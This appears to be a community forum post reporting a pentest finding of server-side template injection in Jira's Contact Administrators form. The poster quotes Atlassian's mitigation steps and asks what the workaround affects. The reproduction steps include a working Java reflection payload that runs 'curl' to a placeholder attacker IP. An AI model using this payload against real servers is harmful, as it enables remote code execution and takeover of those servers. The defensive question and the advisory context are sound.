We have one Vulnerablitiy reported during the pentest: Server-Side Template Injection
Steps to Reproduce:
1. Navigate to "https://*.com/jira/secure/ContactAdministrators!default.jspa"
2. Insert a template injection payload “$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null
).exec('curl http://<AttackerIP>/rcetest?a=a').waitFor()” in the Subject field which requests for a connection back to the attacker machine by issuing a “Curl” command and click on "Send"
3. Upon successful response we can observe that the server is making connections back to the attacker controlled server which can lead to full control of the web server.
From the finding we saw that it was related to the below. Attlasian has mentioned this will fixed in 9.4.x version
https://community.atlassian.com/t5/Jira-Software-articles/CVE-2019-11581-Critical-Security-Advisory-for-Jira-Server-and/ba-p/1128241
As per the recent pentest we found this issue is still existing. In the above article they have given the mitigation steps for this issue.
Does anyone know the impact by doing the Workaround below?
Mitigation Steps
If you are unable to upgrade Jira immediately, then as a temporary workaround, you can:
Disable the Contact Administrators Form; and
Block these endpoints from being accessed:
- /secure/admin/SendBulkMail!default.jspa ,
- /admin/SendBulkMail!default.jspa , and
- /SendBulkMail!default.jspa .
Note that blocking the SendBulkMail endpoint will prevent Jira Administrators from being able to send bulk emails to users.
This can be achieved by denying access in the reverse-proxy, load balancer, or Tomcat directly (see the KB: How to block access to a specific URL at Tomcat).
After upgrading Jira to a fixed version, you can re-enable the Administrator Contact Form, and unblock the SendBulkMail endpoints.
You must be a registered user to add a comment. If you've already registered, sign in. Otherwise, register and sign in.